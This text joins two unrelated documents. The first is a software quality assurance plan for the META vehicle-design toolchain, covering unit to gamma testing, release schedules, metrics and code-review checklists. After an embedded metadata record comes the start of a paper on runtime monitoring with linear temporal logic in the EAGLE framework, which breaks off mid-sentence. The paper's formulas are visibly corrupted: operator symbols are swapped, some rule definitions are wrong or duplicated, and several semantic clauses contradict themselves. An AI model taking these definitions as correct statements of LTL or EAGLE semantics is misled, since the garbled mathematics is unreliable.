iFAB RAM-D Analysis Tool** *Local Execution **Local and Remote COTS Software: Creo CAD Software*** LS-DYNA (Livermore Software Technology Corporation) CTH Impact Simulation Software (Sandia National Laboratories) OpenFOAM for CFD computations Abaqus for FEA computation Dymola for Dynamics computation **Local and Remote Remote Processing Node support plan ISIS will be actively available to support Gamma participants during Central/Eastern time zone business hours. During the Gamma period, ISIS will perform assessments of the remote processing infrastructure. If resources are judged to be insufficient, more resources will be allocated from VehicleFORGE. Long term solutions to inefficiencies, job failures and node allocation will be considered during these weekly assessments. In the event of job failures, the necessary remote personnel will prioritize the resolution above other tasks to insure the fix in a timely manner. Assessments will take place weekly on Thursdays from 2–3pm Central. 5.19 Software Testing 5.19.1 Unit Test All code will be unit tested to ensure that the individual unit (class) performs the required functions and outputs the proper results and data. Proper results are determined by using the design limits of the calling (client) function as specified in the design specification defining the called (server) function. Unit testing is typically white box testing and may require the use of software stubs and symbolic debuggers. This testing helps ensure proper operation of a module because tests are generated with knowledge of the internal workings of the module. 5.19.2 Integration Test There are two levels of integration testing. One level is the process of testing a software capability. During this level, each module is treated as a black box, while conflicts between functions or classes and between software and appropriate hardware are resolved. Integration testing requirements are shown in Attachment 2. Test cases must provide unexpected parameter values when design documentation does not explicitly specify calling requirements for client functions. A second level of integration testing occurs when sufficient modules have been integrated to demonstrate a scenario or user thread. 5.19.3 Alpha Testing Once a developer has completed a new feature, improvement, major bug fix or development task, a package or zip of installers and documentation are wrapped. The documentation includes a background description, user tool instructions, and any other notes. These are then sent to multiple internal ISIS alpha testers for testing. Alpha testers will first address the specific software update that has been implemented into the tools using the latest installer. If the alpha tester is able to successfully complete the task, they will notify the tester and then proceed to testing other core Meta GUI and Test Bench features. A standard checklist is used to sign-off on the core tools by the alpha tester. This process ensures that the new code implementation did not negatively affect other core Meta features. An example of this checklist is seen in Figure 8. If an alpha tester is unable to successfully test the new feature, the tester records the issues in a JIRA ticket and assigns it to the developer’s original ticket. The variety of issues seen can include: software errors, documentation or instruction errors, or a new error with the core Meta tools that was not occurring in a previous version. Once the developer fixes the issue, the alpha tester installs the new version of the tools and re-tests the feature and core tools using the same or updated documentation. A Meta version is not released until two versions of the alpha-sign form is filled out below, stating successful results. **5.19.4 Beta Testing** Once there is alpha sign-off on the new tool or feature, as well as sign off on the corresponding Meta tool version, all of the items required are prepped to be sent out for beta testing. The beta testing process is seen in the diagram below: The beta testing cycle begins with the tool installer and documentation being released and posted to the beta community on the VehicleFORGE resource page. Once everything is posted, the testers send an email with a brief summary of what has been released. Also, URL link locations are posted within the email for each of the following: - **Tool installers**: Tool installers such as and updated Open Meta-CyPhy version, HuDAT, SwRI tool, etc. - **Meta-CyPhy Release Notes**: These list the latest new features, improvements, bug fixes, or tasks that were implemented in the Open Meta-CyPhy version. Updated subversion release notes, will be the same as the version they originated from, but will have highlighted items indicated what is new in the subversion. For example, 14.03.2 release notes will be the same as 14.03.1, except for the new items listed which are highlighted on the notes. - **New tool or feature overview and user instructions**: This documentation will contain all pertinent information necessary to for testers to understand and use the tool. The sections in this document are the purpose, procedures, installation notes, tool background, requirements tested (Test Bench document), theory of operation, instructions for use, metrics, troubleshooting, and future enhancements. - **Specific testing instructions**: These instructions are written in a “task” through VehicleFORGE’s ticket system. Tasks usually include brief background context and instructions for testing. Tasks will sometimes be assigned to testers depending on what needs to be tested. Beta testers will begin the testing process by downloading and installing the tools, reading through the tool documentation, and using the instructions on the VehicleFORGE task for specific testing instructions. Testers will submit feedback tickets for both specific issues with the task-at-hand, as well as general suggestions. There are several different types 5.19.5 **Gamma Test** Gamma testing follows a similar flow to Beta, except the users are much less familiar with the META approach. There is more effort expended in ensuring minimal defects are released and a broader community is involved in deciding both what should be fixed and what should be released [and when]. There are checklists for release readiness, release agreement, and certifications that both tools and Test Benches function properly. The two forms shown in Figure 9 and Figure 10 were used in the Gamma Release process. ### Core CyPhy Tools Test Checklist <table> <thead> <tr> <th>Functions Properly</th> <th>Tool</th> </tr> </thead> <tbody> <tr> <td></td> <td>Component Importer</td> </tr> <tr> <td></td> <td>Meta-Link</td> </tr> <tr> <td></td> <td>Component Authoring Tool</td> </tr> <tr> <td></td> <td>CLM Light</td> </tr> <tr> <td></td> <td>DESERT</td> </tr> <tr> <td></td> <td>Master Interpreter</td> </tr> <tr> <td></td> <td>PCC</td> </tr> <tr> <td></td> <td>Project Analyzer</td> </tr> </tbody> </table> **Figure 9: Core CyPhy Tools Test Checklist** ### Core Test Bench Functionality Checklist <table> <thead> <tr> <th>Scoring</th> <th>Local</th> <th>Remote</th> <th>Test Bench</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> <td>Blast</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Ballistics</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Conceptual MFG</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Detailed MFG</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Completeness</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Ergonomics</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Ingress/Egress</td> </tr> <tr> <td></td> <td></td> <td></td> <td>FOV</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Field of Fire</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Transportability</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Counting</td> </tr> <tr> <td></td> <td></td> <td></td> <td>Dynamics (Surrogate)</td> </tr> </tbody> </table> **Figure 10: Core Test Bench Functionality Checklist** 5.20 Meta Release Schedule Meta releases are available for every code change; however public releases undergo a more involved release process. External public releases follow our 4-week internal development sprints. Below in Figure 11 is the release schedule for 2014 <table> <thead> <tr> <th>Release Date</th> <th>Progress:</th> </tr> </thead> <tbody> <tr> <td>07/Apr/14</td> <td>26 of 26 issues have been resolved</td> </tr> <tr> <td>05/May/14</td> <td>47 of 47 issues have been resolved</td> </tr> <tr> <td>02/Jun/14</td> <td>62 of 62 issues have been resolved</td> </tr> <tr> <td>30/Jun/14</td> <td>48 of 48 issues have been resolved</td> </tr> <tr> <td>28/Jul/14</td> <td>61 of 62 issues have been resolved</td> </tr> <tr> <td>25/Aug/14</td> <td>18 of 18 issues have been resolved</td> </tr> <tr> <td>22/Sep/14</td> <td>No issues.</td> </tr> <tr> <td>20/Oct/14</td> <td>No issues.</td> </tr> </tbody> </table> Figure 11: 2014 META Release Schedule 5.21 Quality Metrics Most metrics have been mentioned before, but the following are important to characterize maturity, complexity, maintainability and quality of the final software products: - Total Defects - Top 10 modules for defects - Defect Sources - Failure Interval - Closure rate - Time to closure - Maximum time to closure - Burndown rate - Number of defects with closure rates longer than 4 spirals - Defect Insertion rates - Time to detect inserted defects - Complexity Number per module - Number of modules with Complexity greater than 10. - Rework Size and efforts This section lists outlines the metrics collected to assess our QA efforts. While the number cannot capture the entire process, they are useful points of information. We have prioritized metrics that are lightweight to collect given our tight development schedules. **Continuous Builds** – Every time a developer commits code to our build server, an automated build and test is triggered. We collect data on the numbers of successful builds across the team and on an individual developer level. **Bugs & Bugs fixed** – Our JIRA system tracks and details bugs and other issues. We are able to assess the numbers of bugs reported, the time required to fix it, and successfully fixed bugs. **User feedback** – We have a number of methods of collecting user feedback. The primary method is VehicleFORGE tickets emerging from beta testers, FANG competitors, and other users. These tickets can be assessed in terms of quantity, turnaround time, and by issue category. **Successful user threads** – The AVM effort is organized into user threads that make up all actions a FANG user would conduct. This organization method allows us to assess our progress with the overall program and understand where we are being successful. **Execution of Development Plan** – Our development is organized into four-week sprints with goals outlines and tracked throughout the phase. Following a sprint, we analyze the previous sprint's progress. 6 Appendix 6.1 Coding Documentation Requirements - A high level language shall be used except when approved by SPM. - Each method, function and class will be identified with their own comment header. The contents of the header should identify the purpose and any assumptions the user or caller must be aware of. - Coding documentation will, at a minimum, describe reasons for code branching and a description of each variable name at their point of memory allocation. - Naming conventions shall be used that clearly distinguish literal constants, variables, methods and class/object names. Class/object names should be nouns, methods should be verbs. Variables shall not be re-used for different purposes, except in trivial cases such as loop counts and indices. In addition, all names will contain at least 2 (two) characters to facilitate global pattern searches. - Coding complexity conventions for a Class shall be established, such as the use of the Cyclomatic Complexity Matrix. A description of how to calculate Cyclomatic complexity index can be found in Chap 13 of Software Engineering a Practitioners Approach by Roger S. Pressman.; McGraw-Hill. The design will not exceed a complexity index value (Vg) of 10, without the approval of the SPM. - Dispatcher logic shall include a default clause, and loops shall include an escape clause except in forever loops. 6.2 Testing Requirements a. Unit Testing: Environment; Specify testing environment. i.e. if and when stubs and drivers and/or other application routines, special hardware and/or conditions are to be used. Logic Complexity: Calculate the Cyclomatic complexity matrix index which specifies the number of test cases required to ensure that all code is executed at least once. A description of how to calculate Cyclomatic complexity index can be found in Chap 13 of Software Engineering a Practitioners Approach by Roger S. Pressman, McGraw-Hill. Boundary Analysis: Specify tests that will execute code using boundaries at n-1, n, n+1. This includes looping instructions, while, for and tests that use LT, GT, LE, GE operators. Error handling: Design tests that verify the recording of all detected and reportable errors that a program is designed to find and report. Global parameter modification: When a program modifies global variables, design tests that verify the modification. That is; initialize the variable independent of the program, verify memory contents, run the program, check that memory contents have been modified. Mathematical limit checking: Design tests that use out of range values that could cause the mathematical function to calculate erroneous results. Cessation of test: Specify the conditions under which a testing session stops and a new build is made. Regression testing is required, according to steps 2 through 6 above, of all lines of code that have been modified. Documentation: The documentation must show that the tests have shown that the topics in items 2 through 6 above have been addressed. b. Integration Testing: This type of testing addresses the issues associated with the dual problems of verification and program construction. Integration is a systematic technique for constructing the program structure while at the same time conducting tests to uncover errors associated with interfacing. The objective is to take unit tested modules and build a program structure that has been dictated by design. The following topics are addressed in the STP. Critical module definition: Decide which classes/modules contain critical control operations. These class/modules should be unit tested as soon as possible and not wait for subordinate class/object completion. Use of program stubs may be necessary. Object grouping: Decide what modules comprise an integration group by use of scenarios and appropriate architecture diagrams. It is desirable to integrate at low levels to make bug definition easier. Choose objects that are related to a specific function like command uplink. Depth vs. breadth testing: Decide how to test a group of objects/classes. It is suggested that breadth testing be used when interfacing with the hardware. Use stubs, if required, to test dispatcher control modules. Use depth testing when a function is well defined and can be demonstrated, e.g. and application mode like timed exposure. Regression testing: Integration regression testing is required whenever an interface attribute has been changed, e.g. the value of a passed parameter. Top down vs. bottom up: Use top down testing to verify major control or decision points. Use bottom up to test hardware driver type programs. c. System testing: System testing is actually a series of different tests whose primary purpose is to fully exercise the computer-based system. Each test may have a different purpose, but all work to expose system limitations. System testing will follow formal test procedures based on hardware, software and science requirements as specified in the STP. d. Validation Testing The purpose of validation is to prove that the META software performs as specified in the User Threads. Validation tests/procedures will identify a testing method and pass/fail criteria. When ranges are specified in the requirements, tests cases will include boundary values at $n-1$, $n$, $n+1$ where possible. When LT or GT limits are specified, the measured value should be recorded. e. Testing Documentation: Testing documentation must be sufficient to provide evidence that the testing objectives as stated in the preceding sections or the STP have been met. 6.3 Inspection and Code Review Guidance Time required: About 200 LoC can be scheduled for review in an hour. Reviews should be no more than 90 minutes long. Location: Free of distraction, environmentally comfortable, support for several laptops and a projector [with screen or appropriate flat surface]. Planning for each review session should include access to user threads, code, test cases, Test Benches, and results of the Test Benches. All previous Bugs and JIRA tickets for that module should also be available. Principal engineer should provide informal notes on the changes and their expected impacts, defects, design choices, etc. Reviewers should include a chair with overall view of the META program, a domain specialist, a language lawyer, and one other technical contributor in addition to the principal engineer. The Chair and Principle engineer document the actions, changes, defects, downstream issues, and expected results within 24 hours of the review session. Within 2 weeks, a subset of the review teams to verify the closure of action items, defect removal and analysis, and Test Bench results. Attachment 4: Defect Types As a minimum, the following defect types should be covered: - Documentation - Syntax - Build, package - Assignment - Interface - Checking - Data - Function - System - Environment 6.4 Sample Checklist - Language - All functions are complete - “Includes” are complete - Check variable and parameter initialization - At program initialization - At start of every loop - At entries - Calls [Pointers, Parameters, use of &] - Names [Consistent, within declared scope, use of “.” for structure/class refs.] - Strings [Identified by pointers, terminated in NULL.] - Pointers [Initialized NULL, only deleted after new, always deleted after use if new.] - Output format [line stepping proper, spacing proper] - Ensure {} are proper and matched - Logic Operators [Proper use, proper (.)] - Line Checks [Syntax, Punctuation] - Standards compliance? - File Open and Close [properly declared, opened, closed] - Meaningful error messages - Consistent style - Clean style - Computation considerations - Unused Code - Security Issues - Adequacy of Comments
{"Source-Url": "http://www.isis.vanderbilt.edu/sites/default/files/Software%20Quality%20Assurance%20for%20the%20META%20Toolchain.pdf", "len_cl100k_base": 12224, "olmocr-version": "0.1.50", "pdf-total-pages": 36, "total-fallback-pages": 0, "total-input-tokens": 70994, "total-output-tokens": 12918, "length": "2e13", "weborganizer": {"__label__adult": 0.0003693103790283203, "__label__art_design": 0.00037288665771484375, "__label__crime_law": 0.0002390146255493164, "__label__education_jobs": 0.0020618438720703125, "__label__entertainment": 6.312131881713867e-05, "__label__fashion_beauty": 0.00018799304962158203, "__label__finance_business": 0.0004756450653076172, "__label__food_dining": 0.0002961158752441406, "__label__games": 0.0007991790771484375, "__label__hardware": 0.0006022453308105469, "__label__health": 0.00022709369659423828, "__label__history": 0.0002014636993408203, "__label__home_hobbies": 0.00011080503463745116, "__label__industrial": 0.0003294944763183594, "__label__literature": 0.00026035308837890625, "__label__politics": 0.00017774105072021484, "__label__religion": 0.00031447410583496094, "__label__science_tech": 0.0032444000244140625, "__label__social_life": 0.0001041889190673828, "__label__software": 0.004459381103515625, "__label__software_dev": 0.98388671875, "__label__sports_fitness": 0.00034689903259277344, "__label__transportation": 0.00044155120849609375, "__label__travel": 0.0001970529556274414}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 59330, 0.03002]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 59330, 0.16205]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 59330, 0.87308]], "google_gemma-3-12b-it_contains_pii": [[0, 400, false], [400, 3556, null], [3556, 6006, null], [6006, 7101, null], [7101, 7396, null], [7396, 9355, null], [9355, 10806, null], [10806, 12034, null], [12034, 12656, null], [12656, 13730, null], [13730, 14209, null], [14209, 15484, null], [15484, 18733, null], [18733, 21221, null], [21221, 23970, null], [23970, 26300, null], [26300, 28424, null], [28424, 31201, null], [31201, 33939, null], [33939, 34582, null], [34582, 35406, null], [35406, 36009, null], [36009, 39017, null], [39017, 40703, null], [40703, 42123, null], [42123, 44243, null], [44243, 45152, null], [45152, 46316, null], [46316, 47635, null], [47635, 48802, null], [48802, 50000, null], [50000, 51574, null], [51574, 54223, null], [54223, 56966, null], [56966, 58468, null], [58468, 59330, null]], "google_gemma-3-12b-it_is_public_document": [[0, 400, true], [400, 3556, null], [3556, 6006, null], [6006, 7101, null], [7101, 7396, null], [7396, 9355, null], [9355, 10806, null], [10806, 12034, null], [12034, 12656, null], [12656, 13730, null], [13730, 14209, null], [14209, 15484, null], [15484, 18733, null], [18733, 21221, null], [21221, 23970, null], [23970, 26300, null], [26300, 28424, null], [28424, 31201, null], [31201, 33939, null], [33939, 34582, null], [34582, 35406, null], [35406, 36009, null], [36009, 39017, null], [39017, 40703, null], [40703, 42123, null], [42123, 44243, null], [44243, 45152, null], [45152, 46316, null], [46316, 47635, null], [47635, 48802, null], [48802, 50000, null], [50000, 51574, null], [51574, 54223, null], [54223, 56966, null], [56966, 58468, null], [58468, 59330, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 59330, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 59330, null]], "pdf_page_numbers": [[0, 400, 1], [400, 3556, 2], [3556, 6006, 3], [6006, 7101, 4], [7101, 7396, 5], [7396, 9355, 6], [9355, 10806, 7], [10806, 12034, 8], [12034, 12656, 9], [12656, 13730, 10], [13730, 14209, 11], [14209, 15484, 12], [15484, 18733, 13], [18733, 21221, 14], [21221, 23970, 15], [23970, 26300, 16], [26300, 28424, 17], [28424, 31201, 18], [31201, 33939, 19], [33939, 34582, 20], [34582, 35406, 21], [35406, 36009, 22], [36009, 39017, 23], [39017, 40703, 24], [40703, 42123, 25], [42123, 44243, 26], [44243, 45152, 27], [45152, 46316, 28], [46316, 47635, 29], [47635, 48802, 30], [48802, 50000, 31], [50000, 51574, 32], [51574, 54223, 33], [54223, 56966, 34], [56966, 58468, 35], [58468, 59330, 36]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 59330, 0.17686]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
080a8dccf85ca3ac1da32a2b8513e1703c322b47
Program Monitoring with LTL in EAGLE Howard Barringer* University of Manchester, England Allen Goldberg, Klaus Havelund Kestrel Technology, NASA Ames Research Center, USA Koushik Sen† University of Illinois, Urbana Champaign, USA Abstract We briefly present a rule-based framework, called EAGLE, shown to be capable of defining and implementing finite trace monitoring logics, including future and past time temporal logic, extended regular expressions, real-time and metric temporal logics (MTL), interval logics, forms of quantified temporal logics, and so on. In this paper we focus on a linear temporal logic (LTL) specialisation of EAGLE. For an initial formula of size $m$, we establish upper bounds of $O(m^{2.2} \log m)$ and $O(m^{2.2} \log^2 m)$ for the space and time complexity, respectively, of a single step evaluation over an input trace. This bound is close to the lower bound $O(2^{\sqrt{m}})$ for future-time LTL presented in [18]. EAGLE has been successfully used, in both LTL and metric LTL forms, to test a real-time controller of an experimental NASA planetary rover. 1. Introduction Linear temporal logic (LTL) [17] is now widely used for expressing properties of concurrent and reactive systems. Associated, production quality, verification tools have been developed, most notably based on model-checking technology, and have enjoyed much success when applied to relatively small-scale models. Tremendous advances have been made in combating the combinatoric state space explosion inherent with data and concurrency in model checking, however, there remain serious limitations for its application to full-scale models and to software. This has encouraged a shift in the way model checking techniques are being applied, from full state space coverage to bounded use for sophisticated testing or debugging, and from static application to dynamic, or runtime, application. Our work on EAGLE concerns this latter direction. *This author is most grateful to RIACS/USRA and to the UK’s EPSRC under grant GR/S40435/01 for the partial support provided to conduct this research. †This author is grateful for the support received from RIACS to undertake this research while participating in the Summer Student Research Program at the NASA Ames Research Center. The paper is structured as follows. Section 2 introduces our logic framework EAGLE and then specializes it to LTL. In section 3 we discuss the monitoring algorithm and calculus with an illustrative example. This underlies our implementation for the special case of LTL, which is briefly described in section 4 where complexity bounds for the implementation can also be found. Section 5 describes an experiment performed using EAGLE, and shows how cyclic deadlock potentials can be detected with EAGLE. Section 6 states conclusion and future work. 2 EAGLE and Linear Temporal Logic EAGLE [5] offers a succinct but powerful set of primitives, essentially supporting recursive parameterized equations, with a minimal/maximal fix-point semantics together with three temporal operators: next-time, previous-time, and concatenation. The parametrization of rules supports reasoning about data values as well as the embedding of real-time, metric and statistical temporal logics. In Section 2.1 we motivate the fundamental concepts of EAGLE through some simple examples drawn from LTL before presenting its formal definition. Then, in Section 2.2 we present a full embedding of LTL in EAGLE and establish its correctness. 2.1 Introducing EAGLE 2.1.1 Fundamental Concepts In most temporal logics, the formulas □F and ◦F satisfy the following equivalences: □F ≡ F ∧ ◦(□F) ◦F ≡ F ∨ ◦(◦F) One can show that □F is a solution to the recursive equation X = F ∧ ◦X; in fact it is the maximal solution. A fundamental idea in our logic, EAGLE, is to support this kind of recursive definition, and to enable users define their own temporal combinators in such a fashion. In the current framework one can write the following definitions for the two combinators Always and Sometime: \[ \begin{align*} \text{max} \text{Always}(\text{Form } F) &= F ∧ ◦\text{Always}(F) \\ \text{min} \text{Sometime}(\text{Form } F) &= F ∨ ◦\text{Sometime}(F) \end{align*} \] First note that these rules are parameterized by an EAGLE formula (of type Form). Thus, assuming an atomic formula, say x < 0, then, in the context of these two definitions, we will be able to write EAGLE formulas such as, Always(x > 0), or Always(Sometime(x > 0)). Secondly, note that the Always operator is defined as maximal; when applied to a formula F it denotes the maximal solution to the equation X = F ∧ ◦X. On the other hand, the Sometime operator is defined as a minimal, and Sometime(F) represents the minimal solution to the equation X = F ∨ ◦X. In EAGLE, this difference only becomes important when evaluating formulas at the boundaries of a trace. EAGLE has been designed specifically as a general purpose kernel temporal logic for run-time monitoring. So to complete this very brief introduction to EAGLE suppose one wished to monitor the following property of a Java program state containing two variables x and y: “whenever we reach a state where x = k > 0 for some value k, then eventually we will reach a state at which y == k”. In a linear temporal logic augmented with first order quantification, we would write: ⟨x > 0 → ∃ k (k = x ∧ (∃ y = k))⟩. The parametrization mechanism of EAGLE allows data as well as formulas as parameters and are able to encode the above as: \[ \begin{align*} \text{min } R(\text{int } k) &= \text{Sometime}(y == k) \\ \text{mon } M &= \text{Always}(x > 0 → R(x)) \end{align*} \] The definition starting with keyword mon specifies the EAGLE formula to be monitored. The rule R is parameterized with an integer k; it is instantiated in the monitor M when x > 0 and hence captures the value of x at that moment. Rule R replaces the existential quantifier. EAGLE also provides a previous-time operator, which allows us to define past time operators, and a concatenation operator, which allows users to define interval based logics, and more. Data parametrization works uniformly for rules over past as well as future; this is non-trivial to achieve as the implementation doesn’t store the trace, see [5]. 2.1.2 EAGLE Syntax A specification S comprises a declaration part D and an observer part O. D comprises zero or more rule definitions R, and O comprises zero or more monitor definitions M, which specify what is to be monitored. Rules and monitors are named (N). \[ \begin{align*} S &= D \cup O \\ D &= R^* \\ O &= M^* \\ R &= (\text{max } [\text{min }]) N(T_1, x_1, \ldots, T_n, x_n) = F \\ M &= \text{mon } N = F \\ T &= \text{Form } | \text{primitive type} \\ F &= \text{exp } | \text{true } | \text{false } | \neg F | F_1 ∧ F_2 | F_1 ∨ F_2 | F_1 → F_2 | ◦F | ◦F | F \cdot F_2 | N(F_1, \ldots, F_n) | x_1 \end{align*} \] A rule definition R is preceded by a keyword indicating whether the interpretation is maximal or minimal. Parameters are typed, and can either be a formula of type Form, or of a primitive type, such as int, long, float, etc.. The body of a rule/monitor is a boolean-valued formula of the syntactic category Form. However, a monitor cannot have a recursive definition, that is, a monitor defined as mon N = F cannot use N in F. For rules we do not place such restrictions. The propositions of this logic are boolean expressions over an observer state. Formulas are composed using standard propositional connectives together with a next-state operator (◦F), a previous-state operator (◦F), and a concatenation-operator (F_1 : F_2). Finally, rules can be applied and their parameters must be type correct; formula arguments can be any formula, with the restriction that if an argument is an expression, it must be of boolean type. 2.1.3 EAGLE Semantics The semantics of the logic is defined in terms of a satisfaction relation, |=, between execution traces and specifications. We assume that an execution trace σ is a finite sequence of program states \(\sigma = s_1 s_2 \ldots s_n\), where \(|\sigma| = n\) is the length of the trace. The \(i\)th state \(s_i\) of a trace \(\sigma\) is denoted by \(\sigma(i)\). The term \(\sigma[i\ldots j]\) denotes the sub-trace of \(\sigma\) from position \(i\) to position \(j\), both positions included. Given a trace \(\sigma\) and a specification \(D\), we define: \[ \sigma \models D \quad \text{iff} \quad \forall \text{mon } N = F \in D. \sigma, i \models D \ F \] That is, a trace satisfies a specification if the trace, observed from position 1 (the first state), satisfies each monitored formula. The definition of the satisfaction relation \(\models D \subseteq (Trace \times Nat) \times Form\), for a set of rule definitions \(D\), is presented below, where \(0 \leq i \leq n + 1\) for some trace \(\sigma = s_1 s_2 \ldots s_n\). Note that the position of a trace can become 0 (before the first state) when going backwards, and can become \(n + 1\) (after the last state) when going forwards, both cases causing rule applications to evaluate to either true if maximal or false if minimal, without considering the body of the rules at that point. \[ \begin{align*} \sigma, i &\models \text{exp} \quad \text{iff} \quad 1 \leq i \leq |\sigma| \text{ and } \text{eval}(\text{exp})(\sigma(i)) \\ \sigma, i &\models \text{true} \\ \sigma, i &\models \neg \text{false} \\ \sigma, i &\not\models \neg F \quad \text{iff} \quad \sigma, i \not\models F \\ \sigma, i &\models F_1 \land F_2 \quad \text{iff} \quad \sigma, i \models F_1 \text{ and } \sigma, i \models F_2 \\ \sigma, i &\models F_1 \lor F_2 \quad \text{iff} \quad \sigma, i \not\models F_1 \text{ or } \sigma, i \not\models F_2 \\ \sigma, i &\models F_1 \rightarrow F_2 \quad \text{iff} \quad \sigma, i \not\models F_1 \text{ implies } \sigma, i \models F_2 \\ \sigma, i &\models \Box F \quad \text{iff} \quad i \leq |\sigma| \text{ and } \sigma, i + 1 \models F \\ \sigma, i &\models \Diamond F \quad \text{iff} \quad 1 \leq i \text{ and } \sigma, i - 1 \not\models F \\ \sigma, i &\models N(F_1, \ldots, F_m) \quad \text{iff} \quad 1 \leq i \leq |\sigma| \text{ then:} \\ &\quad \begin{cases} \sigma, i \not\models F_{[x_1 \rightarrow f_1, \ldots, x_m \rightarrow f_m]} \\ \text{where } (N(F_1, x_1, \ldots, T_m, x_m) = F) \in D \\ otherwise, \text{if } i = 0 \text{ or } i = |\sigma| + 1 \text{ then:} \end{cases} \\ \text{rule } N \text{ is defined as } \max \text{ in } D \end{align*} \] An atomic formula (exp) is evaluated in the current state, \(i\), in case the position \(i\) is within the trace \(1 \leq i \leq n\); for the boundary cases \((i = 0\) and \(i = n + 1\)) it evaluates to false. Propositional connectives have their usual semantics in all positions. A next-time formula \(\Box F\) evaluates to true if the current position is not beyond the last state and \(F\) holds in the next position. Dually for the previous-time formula. The concatenation formula \(F_1.F_2\) is true if the trace \(\sigma\) can be split into two sub-traces \(\sigma = \sigma_1.\sigma_2\), such that \(F_1\) is true on \(\sigma_1\), observed from the current position \(i\), and \(F_2\) is true on \(\sigma_2\) (ignoring \(\sigma_1\), and thereby limiting the scope of past time operators). Applying a rule within the trace (positions \(1 \ldots n\)) consists of replacing the call with the right-hand-side of the definition, substituting arguments for formal parameters. At the boundaries (0 and \(n + 1\)) a rule application evaluates to true if and only if it is maximal. 2.2 Linear Temporal Logic in EAGLE We have briefly seen how in EAGLE one can define rules for the \(\Box\) and \(\Diamond\) temporal operators for LTL. Here we complete an embedding of propositional LTL in EAGLE and prove its semantic correspondence. Figure 1 gives the semantic definition of the since and until LTL temporal operators over finite traces; the definitions of \(\Box\) and \(\Diamond\), and the propositional connectives, are as for EAGLE. We assume the usual collection of future and past linear-time temporal operators. \[ \begin{align*} \sigma, i &\models F_1 \cup F_2 \quad \text{iff} \quad 1 \leq i \leq |\sigma| \text{ and } \exists \sigma_1, \sigma_2 \text{ such that } \sigma_1, i \models F_1 \text{ and } \\ &\quad \forall \sigma_1, \sigma_2, i \leq i_1 < i_2 \text{ implies } \sigma_1, i \models F_1 \ \\ \sigma, i &\models F_1 \land F_2 \quad \text{iff} \quad 1 \leq i \leq |\sigma| \text{ and } \\ &\quad \forall \sigma_1, \sigma_2, i \leq i_1 < i_2 \text{ and } \sigma_1, i \models F_1 \text{ and } \\ &\quad \forall \sigma_1, \sigma_2, i \leq i_1 < i_2 \text{ implies } \sigma_1, i \models F_1 \end{align*} \] with definitions: \[ \begin{align*} \Box F &\equiv true \forall F \\ \Diamond F &\equiv false \exists F \\ \Box F &\equiv \neg \Diamond F \\ \Diamond F &\equiv \neg \Box F \\ F_1 \land F_2 &\equiv F_1 \lor \Box F_2 \\ F_1 \lor F_2 &\equiv F_1 \land \Diamond F_2 \\ \end{align*} \] Figure 1. Semantic definitions for LTL For each temporal operator, future and past, we define a corresponding EAGLE rule. The embedding is straightforward and requires little explanation. The future time operators give rise to the following set of rules: \[ \begin{align*} \text{min } \text{Next} &\equiv (\text{Form } F) \equiv \Box F \\ \text{max } \text{Always} &\equiv (\text{Form } F) \equiv F \land \Box F \\ \text{min } \text{Sometime} &\equiv (\text{Form } F) \equiv F \lor \Diamond F \\ \text{max } \text{Until} &\equiv (\text{Form } F_1, \text{Form } F_2) \equiv F_1 \lor (F_1 \land \Box \text{Until } F_2) \\ \text{max } \text{Unless} &\equiv (\text{Form } F_1, \text{Form } F_2) \equiv F_2 \lor (F_1 \land \Diamond \text{Unless } F_2) \end{align*} \] The past time operators of LTL give rise to the following rules: \[ \begin{align*} \text{min } \text{Previous} &\equiv (\text{Form } F) \equiv \Diamond F \\ \text{max } \text{AlwaysPast} &\equiv (\text{Form } F) \equiv F \land \Diamond \text{AlwaysPast } F \\ \text{min } \text{SometimePast} &\equiv (\text{Form } F) \equiv F \lor \Diamond \text{SometimePast } F \\ \text{min } \text{Since} &\equiv (\text{Form } F_1, \text{Form } F_2) \equiv F_1 \lor (F_1 \land \Diamond \text{Since } F_2) \\ \text{max } \text{Since} &\equiv (\text{Form } F_1, \text{Form } F_2) \equiv F_2 \lor (F_1 \land \Diamond \text{Since } F_2) \end{align*} \] An EAGLE context containing all of the above rules then enables any propositional LTL monitoring formula to be expressed as a monitoring formula in EAGLE by mapping the LTL operators to the EAGLE counterparts. Note that through simply combining the definitions for the future and past time LTLs defined above, we obtain a temporal logic over the future, present and past, in which one can freely intermix the future and past time modalities. Correctness of Embedding: To justify the above EAGLE definitions of LTL temporal operators, we can define an embedding function \(\text{Embed} :\) Consider the Future Time Operators. The definition of the operator $\text{embed}$ is given in Figure 2. The role of the function $\text{update}$ is to pre-evaluate a formula if it is guarded by a previous operator. Formally, $\text{update}$ has the property that $\sigma, i \models \text{update}(F, s)$ if and only if $\sigma, i + 1 \models \text{eval}(F, s)$. Had there been no past time modality in $\text{EAGLE}$ 